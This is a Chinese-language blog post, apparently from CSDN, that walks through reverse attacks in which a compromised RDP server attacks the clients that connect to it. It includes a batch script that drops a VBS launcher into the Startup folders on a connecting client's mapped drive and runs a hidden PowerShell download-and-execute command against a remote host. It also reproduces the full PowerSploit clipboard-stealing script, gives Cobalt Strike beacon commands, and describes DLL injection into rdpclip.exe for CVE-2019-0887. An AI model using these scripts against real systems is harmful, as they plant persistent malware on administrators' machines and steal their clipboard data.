rdp反向攻击利用总结

最新推荐文章于 2024-04-11 16:13:22 发布
最新推荐文章于 2024-04-11 16:13:22 发布
阅读量776 收藏 4
点赞数 1
分类专栏: 内网渗透 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44747030/article/details/127943763
版权

rdp 反向攻击

三种攻击方式

1、基于文件传输的 RDP 反向攻击

依托于开机自启,因此对服务器的攻击效果较差

勾选盘符挂载选项,在客户端连接远程主机的一瞬间,将远程主机上早已准备好的木马程序复制到客户端主机的启动项中,那么当客户端主机下一次启动时便会执行该木程序,客户端主机便可以成功上线。

2、剪切板窃取

rdplicp.exe进程是后台运行的,当管理员同时用远程桌面登陆多个服务器,在其中的某一个服务器上进行复制拷贝操作时,会将数据同步到所有服务器的 rdplicp.exe 进程。

empire中的Get-ClipboardContents.ps1

Import-Module C:\Users\Administrator\Desktop\Get-ClipboardContents.ps1
Get-ClipboardContents >> C:\Users\Administrator\Desktop\content.txt

3、剪切板传输恶意文件

CVE-2019-0887

利用剪切板目录穿越进行恶意文件传输

基于文件传输的RDP反向攻击 复现

要求:需要目标挂载C盘

启动目录位置

开启当前用户的启动目录(当前用户权限)
shell:startup
	C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs


只要有用户登录都会启动(需要管理员权限)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp


没有管理员权限需要复制到当前用户的启动目录

只有通过远程登陆的用户才可以在远程主机中访问 tsclient,其他在远程主机上本地登录的用户是无论如何也无法访问 tsclient 的 (administrator挂载了C盘,其他用户是看不见的)

将 ver2_.vbs(用于被复制)和run.bat 放在C盘的目录下

在这里插入图片描述

启动目录中再放置一份ver_2.vbs(用于启动时执行run.bat)

在这里插入图片描述

run.bat

timeout 1 >nul 2>&1
mkdir \\tsclient\c\temp >nul 2>&1
mkdir C:\temp >nul 2>&1
copy run.bat C:\temp >nul 2>&1
copy run.bat \\tsclient\c\temp >nul 2>&1
del /q %TEMP%\temp_00.txt >nul 2>&1
dir /a:d /b \\tsclient\c\users >>"%TEMP%\temp_00.txt"
for /F %%a in (%TEMP%\temp_00.txt) DO (
	copy "C:\temp\ver_2.vbs" "\\tsclient\c\Users\%%a\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" >> c:/temp/x.txt
)
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.101.231:80/a'))"

ver_2.vbs

set ws=WScript.CreateObject("WScript.Shell")
ws.run "cmd /c C:\temp\run.bat",vbhide

dir /a:d /b  \\tsclient\c\users\*startup*
/b 舍弃标题与摘要内容
/a 只显示指定属性的目录名和文件名
/a:d 只显示文件,而非目录




dir /a:d /b  \\tsclient\c\users
admin
Administrator
All Users
Default
Default User
Public
qaz
剪切板窃取复现

执行命令

目标机器上执行powershell脚本
Import-Module C:\Users\Administrator\Desktop\Get-ClipboardContents.ps1

Get-ClipboardContents >> C:\Users\Administrator\Desktop\content.txt


content.txt 存储读取内容文件





也可以在CS上执行本地POWERSEHLL
beacon> powershell-import C:\Users\Administrator\Desktop\Get-ClipboardContents.ps1

beacon> powershell Get-ClipboardContents

Get-ClipboardContents.ps1 代码

function Get-ClipboardContents {
<#
.SYNOPSIS
 
Monitors the clipboard on a specified interval for changes to copied text.

PowerSploit Function: Get-ClipboardContents
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
y
.PARAMETER CollectionLimit

Specifies the interval in minutes to capture clipboard text. Defaults to indefinite collection.

.PARAMETER PollInterval

Interval (in seconds) to check the clipboard for changes, defaults to 15 seconds.

.EXAMPLE

Invoke-ClipboardMonitor -CollectionLimit 120

.LINK

http://brianreiter.org/2010/09/03/copy-and-paste-with-clipboard-from-powershell/
#>

    [CmdletBinding()] Param (
        [Parameter(Position = 1)]
        [UInt32]
        $CollectionLimit,

        [Parameter(Position = 2)]
        [UInt32]
        $PollInterval = 15
    )

    Add-Type -AssemblyName System.Windows.Forms

    # calculate the stop time if one is specified
    if($CollectionLimit) {
        $StopTime = (Get-Date).addminutes($CollectionLimit)
    }
    else {
        $StopTime = (Get-Date).addyears(10)
    }

    $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
    "=== Get-ClipboardContents Starting at $TimeStamp ===`n"

    # used to check if the contents have changed
    $PrevLength = 0
    $PrevFirstChar = ""

    for(;;){
        if ((Get-Date) -lt $StopTime){

            # stolen/adapted from http://brianreiter.org/2010/09/03/copy-and-paste-with-clipboard-from-powershell/
            $tb = New-Object System.Windows.Forms.TextBox
            $tb.Multiline = $true
            $tb.Paste()

            # only output clipboard data if it's changed
            if (($tb.Text.Length -ne 0) -and ($tb.Text.Length -ne $PrevLength)){
                # if the length isn't 0, the length has changed, and the first character
                # has changed, assume the clipboard has changed
                # YES I know there might be edge cases :)
                if($PrevFirstChar -ne ($tb.Text)[0]){
                    $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
                    "`n=== $TimeStamp ===`n"
                 #    $tb.Text | Out-File -FilePath "C:\Users\Administrator\Desktop\content.txt"
		    $tb.Text
                    $PrevFirstChar = ($tb.Text)[0]
                    $PrevLength = $tb.Text.Length 
                }
            }
        }
        else{
            $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
            "`n=== Get-ClipboardContents Shutting down at $TimeStamp ===`n"
            Break;
        }
        Start-Sleep -s $PollInterval
    }
}
剪切板传输恶意文件(CVE-2019-0887) 复现

编译都需要是64位

dll编译好后重命名为winhlp.dll

exe编译好后重命名为hook.exe

用CS生成自己的木马重命名为winhlp64.exe

自己的木马和dll文件需要放置在目标的c:\windows下

在这里插入图片描述

将winhlp.dll注入到rdpclip.exe中

在这里插入图片描述

随意在rdp机器上复制文件,这里复制的1.txt

在这里插入图片描述

粘贴后会在目标启动目录中附带上cs的exe

在这里插入图片描述

被攻击机器 windows7(成功)

rdp windows server2008

在这里插入图片描述

CVE-2019-0887

物理机windows10 (失败)

rdp windows server2008

在这里插入图片描述

evilxpl
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安全红蓝对抗反制(反捕、画像)
墨痕诉清风的博客
03-09 3614
1.蜜罐 蜜罐可以理解成互联网上的一台主机,它的作用是诱骗攻击者去对自己进行攻击,然后记录攻击者的攻击细节并生成对应的攻击者画像,是当前的一种比较主流的入侵检测系统也是一种主动防御系统。 1.1 放置高交互蜜罐 放置高交互蜜罐,例如一个邮箱服务类型的蜜罐,攻击者有可能会进行邮箱注册,这样子攻击者就主动向我们留下了自己的身份信息。 1.2 放置多个容易被发现的蜜罐 放置多个攻击者可以轻而易举发现的蜜罐,攻击者就会知道自己所在的环境是被蜜罐所包围的,有可能就会放弃进行大范围攻击,变相保护了蜜罐背后的真
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
开启rdp_RDP反向攻击
weixin_26757949的博客
01-13 983
RDP反向攻击介绍这里讲两种攻击方式:利用挂载盘符进行攻击利用CVE-2019-0887进行攻击两者都是在攻击的登录远程桌面时,向攻击者PC的启动目录写入恶意文件,需要重启才能运行恶意文件。我这里测试的时候,存在很多问题,尤其是后者,较不稳定,按照严格意义并没有复现成功,也许是操作系统问题,也许是代码问题。利用挂载盘符原理是通过访问tsclient,并通过目录遍历找到启动目录,将恶意文件...
基于文件传输的RDP反向攻击
chaojixiaojingang
08-06 1609
1.简述 RDP反向攻击的姿势有不少,本次是通过挂载盘符进行 RDP 反向攻击。其基本原理就是Windows 远程桌面客户端 mstsc 有一个盘符挂载选项,如果勾选了该选项,会开启磁盘共享功能,相当于将你的磁盘在远程主机上共享,你可以通过类似于 SMB 文件传输命令那样将位于远程主机上的文件复制到客户端主机上。如果我们通过相应的设置,在客户端连接远程主机的一瞬间,将远程主机上早已准备好的木马程序复制到客户端主机的启动项中,那么当客户端主机下一次启动时便会执行该木程序,客户端主机便可以成功...
RDP攻击
weixin_42584507的博客
01-12 284
RDP (Remote Desktop Protocol) 攻击是指通过利用 RDP 协议中的漏洞来进行的网络攻击RDP 是一种远程桌面协议,可以让用户在远程计算机上运行应用程序和控制远程计算机。由于 RDP 是一种开放的协议,因此它可能存在漏洞,可能被黑客利用来进行攻击。这类攻击的目的通常是控制远程计算机或窃取敏感信息。 ...
RDPInception攻击手法
谢公子的博客
04-28 2416
在讲RDPInception攻击手段之前,我们先了解一下RDP远程桌面(Remote Desktop Protocol)协议。RDP远程桌面协议(Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让网站管理员通过网络连接远程操控服务器。RDP协议默认使用的端口是 3389。 由于RDPInception攻击要求的条件比较苛刻,在现实生产环境中几乎不...
rdp连接工具_通过反向 SSH 隧道连接 RDP
weixin_39783149的博客
11-27 1204
本文作者:hl0rey(信安之路作者团队成员 & 信安之路红蓝对抗小组组长)成员招募:信安之路红蓝对抗小组招募志同道合的朋友这是这个系列最后一篇了,想要看更多内容请大家移步到原网站查看吧,这个系列的翻译可能会存在问题,希望大家可以理解,在实践中遇到问题欢迎与我们交流,有对红蓝对抗感兴趣的同学欢迎联系组长加入组织。22检测发现设置为密码永不过期的用户通常来说我们会把一个服务账户的...
freerdp编译文件wfreerdp.exe
10-31
freerdp基于RDP协议,是一种专门用于远程桌面连接的协议。源码可以从github上下载,资源为编译后的exe文件,包含win32和win64 freerdp 常用参数说明: //远程电脑 wfreerdp.exe /u:用户名 /v:目标主机地址 //远程电脑...
RDP远程访问(远程桌面)的FRPC端设置,配合FRPS服务
11-07
远程桌面协议(RDP,Remote Desktop Protocol)是微软...总之,RDP远程访问通过FRPC和FRPS的配合,可以实现安全的反向代理,有效保护内网RDP服务器免受直接攻击。同时,合理的配置和管理可以进一步提高系统的安全性。
低版本RDP升级RDP高版本
最新发布
04-14
远程桌面协议(RDP,Remote Desktop Protocol)是微软提供的一种远程访问技术,允许用户通过网络连接到另一台计算机,从而实现远程控制、操作和访问该计算机的桌面环境。在IT领域,随着技术的发展,RDP的版本也在...
RDP Wrapper对应的配置文件
02-13
RDP Wrapper对应的配置文件,支持10.0.1904.1503
内网安全:横向传递攻击RDP || Cobalt Strike )
网络安全领域___专研者.
06-11 2332
横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在明文和Hash值获取基础上进行攻击.)
内网渗透测试:基于文件传输的 RDP 反向攻击
Innocence_0的博客
08-20 103
通常认为远程桌面协议是连接远程计算机的安全且值得信赖的应用程序,全球数以千计的 IT专业人员和安全研究人员都在使用远程桌面协议管理者自己的计算机设备,无论是用于帮助远程工作人员还是在安全的 VM 环境中工作,RDP远程桌面客户端都是非常宝贵的工具。然而,这一值得信赖的应用程序并不是完全可靠的,在我的《内网渗透测试:初探远程桌面的安全问题》这篇文章中,我大致罗列出了常见的用于攻击RDP 远程桌面的方式。本节我们就一个问题进行探讨,即如何通过远程桌面服务端反打连接他的客户端。
RDPY:一个在RDP会话期间执行中间人攻击的工具
kevin_bobolkevin的博客
04-28 1943
转载自:https://github.com/citronneur/rdpy RDPY   Remote Desktop Protocol in twisted python. RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client a
话说大部分 的勒索事件来源于RDP远程桌面协议?
04-11 806
这家安全供应商在周三发布了其2024年的活跃对手报告,该报告基于它在2023年进行的150多起事件响应(IR)调查的数据。数据集的分析显示,88%的调查来自于员工数少于1000人的组织,而55%涉及的公司员工数不超过250人。尽管44%的勒索软件攻击案例涉及数据泄露,Sophos发现72%的网络入侵调查“没有数据泄露的证据”。报告指出:“通常,被侵犯和未被侵犯的组织之间唯一的区别在于1) 选择并部署合适工具的准备工作,以及2) 在需要时具备的知识和准备采取行动的能力。“更糟糕的是,凭证加固的状态令人痛心。
域渗透之那些显为人知的RDP漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-08 2040
远程桌面对了解内网渗透的人来说可能再熟悉不过了。在渗透测试中,拿下一台主机后有时候会选择开 3389 进远程桌面查看一下对方主机内有无一些有价值的东西可以利用。但是远程桌面的利用不仅如此,本节我们便来初步汇总一下远程桌面在内网渗透中的各种利用姿势。
老生长谈之NTLM反向攻击
网络——菜市场
07-30 1263
老生长谈之NTLM反向攻击by cocoruder这个似乎火过一段时间,在读书时就看到有很多文章谈这样的攻击。考虑下面的模型A(192.168.0.1,被攻击者)访问B(192.168.0.2,攻击者)某个页面,这个页面的内容可能是1.在A一连接B时,B当然已获得A的IP(192.168.0.1),B立即请求对A的ipc$连接,A返回挑战值(Challenge)。2.接下来A请求B的ipc$连接,
php代码审计-OurPhp 后台任意文件上传getshell
weixin_44747030的博客
10-27 468
OurPhp代码审计
RDP Wrapper
09-14
RDP Wrapper是一种用来扩展远程桌面协议(RDP)的工具,它通过加载termsrv.dll并使用不同的参数来实现功能。RDP Wrapper并不对termsrv.dll进行修补,而是在Service Control Manager和Terminal Services之间添加了一个层。因此,原始的termsrv.dll文件保持不变。这种方法对Windows Update非常强大,因为它可以保护配置文件免受更新的影响。不过需要注意的是,RDP Wrapper可能不支持最新的Windows10 1909版本。如果需要在不支持的版本上使用RDP Wrapper,您可以查找RDPWrapper的GitHub上的Issue,找到其他用户提供的类似的配置代码或配置文件,并将其添加到您的计算机上的rdpwrap.ini文件中,或者直接替换该文件,然后重新执行install.bat命令。这样就可以解决在不支持的版本上使用RDP Wrapper的问题。请注意,这些操作可能需要管理员权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值